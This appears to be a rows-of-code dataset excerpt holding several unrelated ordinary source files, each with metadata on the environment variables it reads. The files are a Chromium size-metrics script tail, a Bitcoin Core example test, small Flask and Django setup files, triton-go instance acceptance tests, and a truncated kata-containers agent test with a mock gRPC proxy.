def _dump_chart_json(output_dir, chartjson):
"""Writes chart histogram to JSON files.
Output files:
results-chart.json contains the chart JSON.
perf_results.json contains histogram JSON for Catapult.
Args:
output_dir: Directory to place the JSON files.
chartjson: Source JSON data for output files.
"""
results_path = os.path.join(output_dir, 'results-chart.json')
logging.critical('Dumping chartjson to %s', results_path)
with open(results_path, 'w') as json_file:
json.dump(chartjson, json_file, indent=2)
# We would ideally generate a histogram set directly instead of generating
# chartjson then converting. However, perf_tests_results_helper is in
# //build, which doesn't seem to have any precedent for depending on
# anything in Catapult. This can probably be fixed, but since this doesn't
# need to be super fast or anything, converting is a good enough solution
# for the time being.
histogram_result = convert_chart_json.ConvertChartJson(results_path)
if histogram_result.returncode != 0:
raise Exception('chartjson conversion failed with error: ' +
histogram_result.stdout)
histogram_path = os.path.join(output_dir, 'perf_results.json')
logging.critical('Dumping histograms to %s', histogram_path)
with open(histogram_path, 'wb') as json_file:
json_file.write(histogram_result.stdout)
def _run_resource_sizes(args):
"""Main flow to extract and output size data."""
chartjson = _BASE_CHART.copy()
report_func = perf_tests_results_helper.ReportPerfResult
total_sizes = collections.Counter()
def report_sizes(sizes, title, track_stripped, track_compressed):
report_func(chart_data=chartjson,
graph_title=title,
trace_title='size',
value=sizes[_KEY_RAW],
units='bytes')
if track_stripped:
report_func(chart_data=chartjson,
graph_title=title + ' (Stripped)',
trace_title='size',
value=sizes[_KEY_STRIPPED],
units='bytes')
if track_compressed:
report_func(chart_data=chartjson,
graph_title=title + ' (Gzipped)',
trace_title='size',
value=sizes[_KEY_GZIPPED],
units='bytes')
if track_stripped and track_compressed:
report_func(chart_data=chartjson,
graph_title=title + ' (Stripped, Gzipped)',
trace_title='size',
value=sizes[_KEY_STRIPPED_GZIPPED],
units='bytes')
for g in _TRACKED_GROUPS:
sizes = sum(
map(_get_catagorized_filesizes, _visit_paths(args.out_dir, g.paths)),
collections.Counter())
report_sizes(sizes, g.title, g.track_stripped, g.track_compressed)
# Total compressed size is summed over individual compressed sizes, instead
# of concatanating first, then compress everything. This is done for
# simplicity. It also gives a conservative size estimate (assuming file
# metadata and overheads are negligible).
total_sizes += sizes
report_sizes(total_sizes, 'Total', True, True)
_dump_chart_json(args.output_dir, chartjson)
def main():
"""Parses arguments and runs high level flows."""
argparser = argparse.ArgumentParser(description='Writes LaCrOS size metrics.')
argparser.add_argument('--chromium-output-directory',
dest='out_dir',
required=True,
type=os.path.realpath,
help='Location of the build artifacts.')
output_group = argparser.add_mutually_exclusive_group()
output_group.add_argument('--output-dir',
default='.',
help='Directory to save chartjson to.')
# Accepted to conform to the isolated script interface, but ignored.
argparser.add_argument('--isolated-script-test-filter',
help=argparse.SUPPRESS)
argparser.add_argument('--isolated-script-test-perf-output',
type=os.path.realpath,
help=argparse.SUPPRESS)
output_group.add_argument(
'--isolated-script-test-output',
type=os.path.realpath,
help='File to which results will be written in the simplified JSON '
'output format.')
args = argparser.parse_args()
isolated_script_output = {'valid': False, 'failures': []}
if args.isolated_script_test_output:
test_name = 'lacros_resource_sizes'
args.output_dir = os.path.join(
os.path.dirname(args.isolated_script_test_output), test_name)
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
try:
_run_resource_sizes(args)
isolated_script_output = {'valid': True, 'failures': []}
finally:
if args.isolated_script_test_output:
results_path = os.path.join(args.output_dir, 'test_results.json')
with open(results_path, 'w') as output_file:
json.dump(isolated_script_output, output_file)
with open(args.isolated_script_test_output, 'w') as output_file:
json.dump(isolated_script_output, output_file)
if __name__ == '__main__':
main()
| []
| []
| [
"CHECKOUT_SOURCE_ROOT"
]
| [] | ["CHECKOUT_SOURCE_ROOT"] | python | 1 | 0 | |
test/functional/example_test.py | #!/usr/bin/env python3
# Copyright (c) 2017-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""An example functional test
The module-level docstring should include a high-level description of
what the test is doing. It's the first thing people see when they open
the file and should give the reader information about *what* the test
is testing and *how* it's being tested
"""
# Imports should be in PEP8 ordering (std library first, then third party
# libraries then local imports).
from collections import defaultdict
# Avoid wildcard * imports
from test_framework.blocktools import (create_block, create_coinbase)
from test_framework.messages import CInv, MSG_BLOCK
from test_framework.p2p import (
P2PInterface,
msg_block,
msg_getdata,
p2p_lock,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
)
# P2PInterface is a class containing callbacks to be executed when a P2P
# message is received from the node-under-test. Subclass P2PInterface and
# override the on_*() methods if you need custom behaviour.
class BaseNode(P2PInterface):
def __init__(self):
"""Initialize the P2PInterface
Used to initialize custom properties for the Node that aren't
included by default in the base class. Be aware that the P2PInterface
base class already stores a counter for each P2P message type and the
last received message of each type, which should be sufficient for the
needs of most tests.
Call super().__init__() first for standard initialization and then
initialize custom properties."""
super().__init__()
# Stores a dictionary of all blocks received
self.block_receive_map = defaultdict(int)
def on_block(self, message):
"""Override the standard on_block callback
Store the hash of a received block in the dictionary."""
message.block.calc_sha256()
self.block_receive_map[message.block.sha256] += 1
def on_inv(self, message):
"""Override the standard on_inv callback"""
pass
def custom_function():
"""Do some custom behaviour
If this function is more generally useful for other tests, consider
moving it to a module in test_framework."""
# self.log.info("running custom_function") # Oops! Can't run self.log outside the BitcoinTestFramework
pass
class ExampleTest(BitcoinTestFramework):
# Each functional test is a subclass of the BitcoinTestFramework class.
# Override the set_test_params(), skip_test_if_missing_module(), add_options(), setup_chain(), setup_network()
# and setup_nodes() methods to customize the test setup as required.
def set_test_params(self):
"""Override test parameters for your individual test.
This method must be overridden and num_nodes must be explicitly set."""
# By default every test loads a pre-mined chain of 200 blocks from cache.
# Set setup_clean_chain to True to skip this and start from the Genesis
# block.
self.setup_clean_chain = True
self.num_nodes = 3
# Use self.extra_args to change command-line arguments for the nodes
self.extra_args = [[], ["-logips"], []]
# self.log.info("I've finished set_test_params") # Oops! Can't run self.log before run_test()
# Use skip_test_if_missing_module() to skip the test if your test requires certain modules to be present.
# This test uses generate which requires wallet to be compiled
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
# Use add_options() to add specific command-line options for your test.
# In practice this is not used very much, since the tests are mostly written
# to be run in automated environments without command-line options.
# def add_options()
# pass
# Use setup_chain() to customize the node data directories. In practice
# this is not used very much since the default behaviour is almost always
# fine
# def setup_chain():
# pass
# def setup_network(self):
# """Setup the test network topology
# Often you won't need to override this, since the standard network topology
# (linear: node0 <-> node1 <-> node2 <-> ...) is fine for most tests.
# If you do override this method, remember to start the nodes, assign
# them to self.nodes, connect them and then sync."""
# self.setup_nodes()
# # In this test, we're not connecting node2 to node0 or node1. Calls to
# # sync_all() should not include node2, since we're not expecting it to
# # sync.
# self.connect_nodes(0, 1)
# self.sync_all(self.nodes[0:2])
# Use setup_nodes() to customize the node start behaviour (for example if
# you don't want to start all nodes at the start of the test).
# def setup_nodes():
# pass
def custom_method(self):
"""Do some custom behaviour for this test
Define it in a method here because you're going to use it repeatedly.
If you think it's useful in general, consider moving it to the base
BitcoinTestFramework class so other tests can use it."""
self.log.info("Running custom_method")
def run_test(self):
"""Main test logic"""
### Kunal's Test
self.log.info("Node1 mining a block")
self.generate(self.nodes[1], nblocks=1)
self.log.info("Node1 has mined a block, automatically sent to node2 in network")
self.log.info("Nodes are syncing blocks now")
self.sync_blocks()
self.log.info("Nodes' blocks have been synced")
self.log.info("Checking that node2 has received block...")
assert_equal(self.nodes[1].getbestblockhash(), self.nodes[2].getbestblockhash())
self.log.info("Node2 has received and accepted the block!")
# # Create P2P connections will wait for a verack to make sure the connection is fully up
# peer_messaging = self.nodes[0].add_p2p_connection(BaseNode())
# # Generating a block on one of the nodes will get us out of IBD
# blocks = [int(self.generate(self.nodes[0], sync_fun=lambda: self.sync_all(self.nodes[0:2]), nblocks=1)[0], 16)]
# # Notice above how we called an RPC by calling a method with the same
# # name on the node object. Notice also how we used a keyword argument
# # to specify a named RPC argument. Neither of those are defined on the
# # node object. Instead there's some __getattr__() magic going on under
# # the covers to dispatch unrecognised attribute calls to the RPC
# # interface.
# # Logs are nice. Do plenty of them. They can be used in place of comments for
# # breaking the test into sub-sections.
# self.log.info("Starting test!")
# # self.log.info("Calling a custom function")
# # custom_function()
# # self.log.info("Calling a custom method")
# # self.custom_method()
# self.log.info("Create some blocks")
# self.tip = int(self.nodes[0].getbestblockhash(), 16)
# self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
# height = self.nodes[0].getblockcount()
# for _ in range(10):
# # Use the blocktools functionality to manually build a block.
# # Calling the generate() rpc is easier, but this allows us to exactly
# # control the blocks and transactions.
# block = create_block(self.tip, create_coinbase(height+1), self.block_time)
# block.solve()
# block_message = msg_block(block)
# # Send message is used to send a P2P message to the node over our P2PInterface
# peer_messaging.send_message(block_message)
# self.tip = block.sha256
# blocks.append(self.tip)
# self.block_time += 1
# height += 1
# self.log.info("Wait for node1 to reach current tip (height 11) using RPC")
# self.nodes[1].waitforblockheight(11)
# self.log.info("Connect node2 and node1")
# self.connect_nodes(1, 2)
# self.log.info("Wait for node2 to receive all the blocks from node1")
# self.sync_all()
# self.log.info("Add P2P connection to node2")
# self.nodes[0].disconnect_p2ps()
# peer_receiving = self.nodes[2].add_p2p_connection(BaseNode())
# self.log.info("Test that node2 propagates all the blocks to us")
# getdata_request = msg_getdata()
# for block in blocks:
# getdata_request.inv.append(CInv(MSG_BLOCK, block))
# peer_receiving.send_message(getdata_request)
# # wait_until() will loop until a predicate condition is met. Use it to test properties of the
# # P2PInterface objects.
# peer_receiving.wait_until(lambda: sorted(blocks) == sorted(list(peer_receiving.block_receive_map.keys())), timeout=5)
# self.log.info("Check that each block was received only once")
# # The network thread uses a global lock on data access to the P2PConnection objects when sending and receiving
# # messages. The test thread should acquire the global lock before accessing any P2PConnection data to avoid locking
# # and synchronization issues. Note p2p.wait_until() acquires this global lock internally when testing the predicate.
# with p2p_lock:
# for block in peer_receiving.block_receive_map.values():
# assert_equal(block, 1)
if __name__ == '__main__':
ExampleTest().main()
| []
| []
| []
| [] | [] | python | null | null | null |
meli_auth/__init__.py | import os
from flask import Flask
app = Flask(__name__)
from meli_auth.views import meli_views
app.register_blueprint(meli_views, url_prefix=os.environ.get('MELI_AUTH_ROOT_URL'))
| []
| []
| [
"MELI_AUTH_ROOT_URL"
]
| [] | ["MELI_AUTH_ROOT_URL"] | python | 1 | 0 | |
myart/wsgi.py | """
WSGI config for myart project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "myart.settings")
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
vendor/github.com/joyent/triton-go/compute/instances_test.go | package compute
import (
"context"
"errors"
"fmt"
"log"
"math/rand"
"os"
"reflect"
"testing"
"time"
triton "github.com/joyent/triton-go"
"github.com/joyent/triton-go/network"
"github.com/joyent/triton-go/testutils"
)
func getAnyInstanceID(t *testing.T, client *ComputeClient) (string, error) {
ctx := context.Background()
input := &ListInstancesInput{}
instances, err := client.Instances().List(ctx, input)
if err != nil {
return "", err
}
for _, m := range instances {
if len(m.ID) > 0 {
return m.ID, nil
}
}
t.Skip()
return "", errors.New("no machines configured")
}
func RandInt() int {
reseed()
return rand.New(rand.NewSource(time.Now().UnixNano())).Int()
}
func RandWithPrefix(name string) string {
return fmt.Sprintf("%s-%d", name, RandInt())
}
// Seeds random with current timestamp
func reseed() {
rand.Seed(time.Now().UTC().UnixNano())
}
func TestAccInstances_Create(t *testing.T) {
testInstanceName := RandWithPrefix("acctest")
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
computeClient, err := NewClient(config)
if err != nil {
return nil, err
}
networkClient, err := network.NewClient(config)
if err != nil {
return nil, err
}
return []interface{}{
computeClient,
networkClient,
}, nil
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
clients := client.([]interface{})
c := clients[0].(*ComputeClient)
n := clients[1].(*network.NetworkClient)
images, err := c.Images().List(context.Background(), &ListImagesInput{
Name: "ubuntu-16.04",
Version: "20170403",
})
img := images[0]
var net *network.Network
networkName := "Joyent-SDC-Private"
nets, err := n.List(context.Background(), &network.ListInput{})
if err != nil {
return nil, err
}
for _, found := range nets {
if found.Name == networkName {
net = found
}
}
input := &CreateInstanceInput{
Name: testInstanceName,
Package: "g4-highcpu-128M",
Image: img.ID,
Networks: []string{net.Id},
Metadata: map[string]string{
"metadata1": "value1",
},
Tags: map[string]string{
"tag1": "value1",
},
CNS: InstanceCNS{
Services: []string{"testapp", "testweb"},
},
}
created, err := c.Instances().Create(context.Background(), input)
if err != nil {
return nil, err
}
state := make(chan *Instance, 1)
go func(createdID string, c *ComputeClient) {
for {
time.Sleep(1 * time.Second)
instance, err := c.Instances().Get(context.Background(), &GetInstanceInput{
ID: createdID,
})
if err != nil {
log.Fatalf("Get(): %v", err)
}
if instance.State == "running" {
state <- instance
}
}
}(created.ID, c)
select {
case instance := <-state:
return instance, nil
case <-time.After(5 * time.Minute):
return nil, fmt.Errorf("Timed out waiting for instance to provision")
}
},
CleanupFunc: func(client interface{}, stateBag interface{}) {
instance, instOk := stateBag.(*Instance)
if !instOk {
log.Println("Expected instance to be Instance")
return
}
if instance.Name != testInstanceName {
log.Printf("Expected instance to be named %s: found %s\n",
testInstanceName, instance.Name)
return
}
clients := client.([]interface{})
c, clientOk := clients[0].(*ComputeClient)
if !clientOk {
log.Println("Expected client to be ComputeClient")
return
}
err := c.Instances().Delete(context.Background(), &DeleteInstanceInput{
ID: instance.ID,
})
if err != nil {
log.Printf("Could not delete instance %s\n", instance.Name)
}
return
},
},
&testutils.StepAssertFunc{
AssertFunc: func(state testutils.TritonStateBag) error {
instanceRaw, found := state.GetOk("instances")
if !found {
return fmt.Errorf("State key %q not found", "instances")
}
instance, ok := instanceRaw.(*Instance)
if !ok {
return errors.New("Expected state to include instance")
}
if instance.State != "running" {
return fmt.Errorf("Expected instance state to be \"running\": found %s",
instance.State)
}
if instance.ID == "" {
return fmt.Errorf("Expected instance ID: found \"\"")
}
if instance.Name == "" {
return fmt.Errorf("Expected instance Name: found \"\"")
}
if instance.Memory != 128 {
return fmt.Errorf("Expected instance Memory to be 128: found \"%d\"",
instance.Memory)
}
metadataVal, metaOk := instance.Metadata["metadata1"]
if !metaOk {
return fmt.Errorf("Expected instance to have Metadata: found \"%v\"",
instance.Metadata)
}
if metadataVal != "value1" {
return fmt.Errorf("Expected instance Metadata \"metadata1\" to equal \"value1\": found \"%s\"",
metadataVal)
}
tagVal, tagOk := instance.Tags["tag1"]
if !tagOk {
return fmt.Errorf("Expected instance to have Tags: found \"%v\"",
instance.Tags)
}
if tagVal != "value1" {
return fmt.Errorf("Expected instance Tag \"tag1\" to equal \"value1\": found \"%s\"",
tagVal)
}
services := []string{"testapp", "testweb"}
if !reflect.DeepEqual(instance.CNS.Services, services) {
return fmt.Errorf("Expected instance CNS Services \"%s\", to equal \"%v\"",
instance.CNS.Services, services)
}
return nil
},
},
},
})
}
func TestAccInstances_Get(t *testing.T) {
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
return NewClient(config)
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
c := client.(*ComputeClient)
instanceID, err := getAnyInstanceID(t, c)
if err != nil {
return nil, err
}
ctx := context.Background()
input := &GetInstanceInput{
ID: instanceID,
}
return c.Instances().Get(ctx, input)
},
},
&testutils.StepAssertSet{
StateBagKey: "instances",
Keys: []string{"ID", "Name", "Type", "Tags"},
},
},
})
}
// FIXME(seanc@): TestAccMachine_ListMachineTags assumes that any machine ID
// returned from getAnyInstanceID will have at least one tag.
func TestAccInstances_ListTags(t *testing.T) {
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
return NewClient(config)
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
c := client.(*ComputeClient)
instanceID, err := getAnyInstanceID(t, c)
if err != nil {
return nil, err
}
ctx := context.Background()
input := &ListTagsInput{
ID: instanceID,
}
return c.Instances().ListTags(ctx, input)
},
},
&testutils.StepAssertFunc{
AssertFunc: func(state testutils.TritonStateBag) error {
tagsRaw, found := state.GetOk("instances")
if !found {
return fmt.Errorf("State key %q not found", "instances")
}
tags := tagsRaw.(map[string]interface{})
if len(tags) == 0 {
return errors.New("Expected at least one tag on machine")
}
return nil
},
},
},
})
}
func TestAccInstances_UpdateMetadata(t *testing.T) {
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
return NewClient(config)
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
c := client.(*ComputeClient)
instanceID, err := getAnyInstanceID(t, c)
if err != nil {
return nil, err
}
ctx := context.Background()
input := &UpdateMetadataInput{
ID: instanceID,
Metadata: map[string]string{
"tester": os.Getenv("USER"),
},
}
return c.Instances().UpdateMetadata(ctx, input)
},
},
&testutils.StepAssertFunc{
AssertFunc: func(state testutils.TritonStateBag) error {
mdataRaw, found := state.GetOk("instances")
if !found {
return fmt.Errorf("State key %q not found", "instances")
}
mdata := mdataRaw.(map[string]string)
if len(mdata) == 0 {
return errors.New("Expected metadata on machine")
}
if mdata["tester"] != os.Getenv("USER") {
return errors.New("Expected test metadata to equal environ $USER")
}
return nil
},
},
},
})
}
func TestAccInstances_ListMetadata(t *testing.T) {
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
return NewClient(config)
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
c := client.(*ComputeClient)
instanceID, err := getAnyInstanceID(t, c)
if err != nil {
return nil, err
}
ctx := context.Background()
input := &ListMetadataInput{
ID: instanceID,
}
return c.Instances().ListMetadata(ctx, input)
},
},
&testutils.StepAssertFunc{
AssertFunc: func(state testutils.TritonStateBag) error {
mdataRaw, found := state.GetOk("instances")
if !found {
return fmt.Errorf("State key %q not found", "instances")
}
mdata := mdataRaw.(map[string]string)
if len(mdata) == 0 {
return errors.New("Expected metadata on machine")
}
if mdata["root_authorized_keys"] == "" {
return errors.New("Expected test metadata to have key")
}
return nil
},
},
},
})
}
func TestAccInstances_GetMetadata(t *testing.T) {
testutils.AccTest(t, testutils.TestCase{
Steps: []testutils.Step{
&testutils.StepClient{
StateBagKey: "instances",
CallFunc: func(config *triton.ClientConfig) (interface{}, error) {
return NewClient(config)
},
},
&testutils.StepAPICall{
StateBagKey: "instances",
CallFunc: func(client interface{}) (interface{}, error) {
c := client.(*ComputeClient)
instanceID, err := getAnyInstanceID(t, c)
if err != nil {
return nil, err
}
ctx := context.Background()
input := &UpdateMetadataInput{
ID: instanceID,
Metadata: map[string]string{
"testkey": os.Getenv("USER"),
},
}
_, err = c.Instances().UpdateMetadata(ctx, input)
if err != nil {
return nil, err
}
ctx2 := context.Background()
input2 := &GetMetadataInput{
ID: instanceID,
Key: "testkey",
}
return c.Instances().GetMetadata(ctx2, input2)
},
},
&testutils.StepAssertFunc{
AssertFunc: func(state testutils.TritonStateBag) error {
mdataValue := state.Get("instances")
retValue := fmt.Sprintf("\"%s\"", os.Getenv("USER"))
if mdataValue != retValue {
return errors.New("Expected test metadata to equal environ \"$USER\"")
}
return nil
},
},
},
})
}
| [
"\"USER\"",
"\"USER\"",
"\"USER\"",
"\"USER\""
]
| []
| [
"USER"
]
| [] | ["USER"] | go | 1 | 0 | |
src/runtime/virtcontainers/kata_agent_test.go | // Copyright (c) 2018 Intel Corporation
//
// SPDX-License-Identifier: Apache-2.0
//
package virtcontainers
import (
"bufio"
"context"
"fmt"
"io/ioutil"
"os"
"path"
"path/filepath"
"reflect"
"strings"
"syscall"
"testing"
"github.com/containerd/ttrpc"
gpb "github.com/gogo/protobuf/types"
specs "github.com/opencontainers/runtime-spec/specs-go"
"github.com/stretchr/testify/assert"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/device/api"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/device/config"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/device/drivers"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/device/manager"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/persist"
aTypes "github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/agent/protocols"
pb "github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/agent/protocols/grpc"
vcAnnotations "github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/annotations"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/mock"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/rootless"
vcTypes "github.com/kata-containers/kata-containers/src/runtime/virtcontainers/pkg/types"
"github.com/kata-containers/kata-containers/src/runtime/virtcontainers/types"
)
var (
testKataProxyURLTempl = "unix://%s/kata-proxy-test.sock"
testBlkDriveFormat = "testBlkDriveFormat"
testBlockDeviceCtrPath = "testBlockDeviceCtrPath"
testDevNo = "testDevNo"
testNvdimmID = "testNvdimmID"
testPCIAddr = "04/02"
testSCSIAddr = "testSCSIAddr"
testVirtPath = "testVirtPath"
)
func testGenerateKataProxySockDir() (string, error) {
dir, err := ioutil.TempDir("", "kata-proxy-test")
if err != nil {
return "", err
}
return dir, nil
}
func TestKataAgentConnect(t *testing.T) {
assert := assert.New(t)
proxy := mock.ProxyGRPCMock{
GRPCImplementer: &gRPCProxy{},
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.NoError(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
err = proxy.Start(testKataProxyURL)
assert.NoError(err)
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
err = k.connect()
assert.NoError(err)
assert.NotNil(k.client)
}
func TestKataAgentDisconnect(t *testing.T) {
assert := assert.New(t)
proxy := mock.ProxyGRPCMock{
GRPCImplementer: &gRPCProxy{},
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.NoError(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
err = proxy.Start(testKataProxyURL)
assert.NoError(err)
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
assert.NoError(k.connect())
assert.NoError(k.disconnect())
assert.Nil(k.client)
}
type gRPCProxy struct{}
var emptyResp = &gpb.Empty{}
func (p *gRPCProxy) CreateContainer(ctx context.Context, req *pb.CreateContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) StartContainer(ctx context.Context, req *pb.StartContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) ExecProcess(ctx context.Context, req *pb.ExecProcessRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) SignalProcess(ctx context.Context, req *pb.SignalProcessRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) WaitProcess(ctx context.Context, req *pb.WaitProcessRequest) (*pb.WaitProcessResponse, error) {
return &pb.WaitProcessResponse{}, nil
}
func (p *gRPCProxy) ListProcesses(ctx context.Context, req *pb.ListProcessesRequest) (*pb.ListProcessesResponse, error) {
return &pb.ListProcessesResponse{}, nil
}
func (p *gRPCProxy) UpdateContainer(ctx context.Context, req *pb.UpdateContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) RemoveContainer(ctx context.Context, req *pb.RemoveContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) WriteStdin(ctx context.Context, req *pb.WriteStreamRequest) (*pb.WriteStreamResponse, error) {
return &pb.WriteStreamResponse{}, nil
}
func (p *gRPCProxy) ReadStdout(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {
return &pb.ReadStreamResponse{}, nil
}
func (p *gRPCProxy) ReadStderr(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {
return &pb.ReadStreamResponse{}, nil
}
func (p *gRPCProxy) CloseStdin(ctx context.Context, req *pb.CloseStdinRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) TtyWinResize(ctx context.Context, req *pb.TtyWinResizeRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) CreateSandbox(ctx context.Context, req *pb.CreateSandboxRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) DestroySandbox(ctx context.Context, req *pb.DestroySandboxRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) UpdateInterface(ctx context.Context, req *pb.UpdateInterfaceRequest) (*aTypes.Interface, error) {
return &aTypes.Interface{}, nil
}
func (p *gRPCProxy) UpdateRoutes(ctx context.Context, req *pb.UpdateRoutesRequest) (*pb.Routes, error) {
return &pb.Routes{}, nil
}
func (p *gRPCProxy) ListInterfaces(ctx context.Context, req *pb.ListInterfacesRequest) (*pb.Interfaces, error) {
return &pb.Interfaces{}, nil
}
func (p *gRPCProxy) ListRoutes(ctx context.Context, req *pb.ListRoutesRequest) (*pb.Routes, error) {
return &pb.Routes{}, nil
}
func (p *gRPCProxy) AddARPNeighbors(ctx context.Context, req *pb.AddARPNeighborsRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) OnlineCPUMem(ctx context.Context, req *pb.OnlineCPUMemRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) StatsContainer(ctx context.Context, req *pb.StatsContainerRequest) (*pb.StatsContainerResponse, error) {
return &pb.StatsContainerResponse{}, nil
}
func (p *gRPCProxy) Check(ctx context.Context, req *pb.CheckRequest) (*pb.HealthCheckResponse, error) {
return &pb.HealthCheckResponse{}, nil
}
func (p *gRPCProxy) Version(ctx context.Context, req *pb.CheckRequest) (*pb.VersionCheckResponse, error) {
return &pb.VersionCheckResponse{}, nil
}
func (p *gRPCProxy) PauseContainer(ctx context.Context, req *pb.PauseContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) ResumeContainer(ctx context.Context, req *pb.ResumeContainerRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) ReseedRandomDev(ctx context.Context, req *pb.ReseedRandomDevRequest) (*gpb.Empty, error) {
return emptyResp, nil
}
func (p *gRPCProxy) GetGuestDetails(ctx context.Context, req *pb.GuestDetailsRequest) (*pb.GuestDetailsResponse, error) {
return &pb.GuestDetailsResponse{}, nil
}
func (p *gRPCProxy) SetGuestDateTime(ctx context.Context, req *pb.SetGuestDateTimeRequest) (*gpb.Empty, error) {
return &gpb.Empty{}, nil
}
func (p *gRPCProxy) CopyFile(ctx context.Context, req *pb.CopyFileRequest) (*gpb.Empty, error) {
return &gpb.Empty{}, nil
}
func (p *gRPCProxy) StartTracing(ctx context.Context, req *pb.StartTracingRequest) (*gpb.Empty, error) {
return &gpb.Empty{}, nil
}
func (p *gRPCProxy) StopTracing(ctx context.Context, req *pb.StopTracingRequest) (*gpb.Empty, error) {
return &gpb.Empty{}, nil
}
func (p *gRPCProxy) MemHotplugByProbe(ctx context.Context, req *pb.MemHotplugByProbeRequest) (*gpb.Empty, error) {
return &gpb.Empty{}, nil
}
func (p *gRPCProxy) GetOOMEvent(ctx context.Context, req *pb.GetOOMEventRequest) (*pb.OOMEvent, error) {
return &pb.OOMEvent{}, nil
}
func gRPCRegister(s *ttrpc.Server, srv interface{}) {
switch g := srv.(type) {
case *gRPCProxy:
pb.RegisterAgentServiceService(s, g)
pb.RegisterHealthService(s, g)
}
}
var reqList = []interface{}{
&pb.CreateSandboxRequest{},
&pb.DestroySandboxRequest{},
&pb.ExecProcessRequest{},
&pb.CreateContainerRequest{},
&pb.StartContainerRequest{},
&pb.RemoveContainerRequest{},
&pb.SignalProcessRequest{},
&pb.CheckRequest{},
&pb.WaitProcessRequest{},
&pb.StatsContainerRequest{},
&pb.SetGuestDateTimeRequest{},
}
func TestKataAgentSendReq(t *testing.T) {
assert := assert.New(t)
impl := &gRPCProxy{}
proxy := mock.ProxyGRPCMock{
GRPCImplementer: impl,
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.Nil(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
err = proxy.Start(testKataProxyURL)
assert.Nil(err)
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
for _, req := range reqList {
_, err = k.sendReq(req)
assert.Nil(err)
}
sandbox := &Sandbox{}
container := &Container{}
execid := "processFooBar"
err = k.startContainer(sandbox, container)
assert.Nil(err)
err = k.signalProcess(container, execid, syscall.SIGKILL, true)
assert.Nil(err)
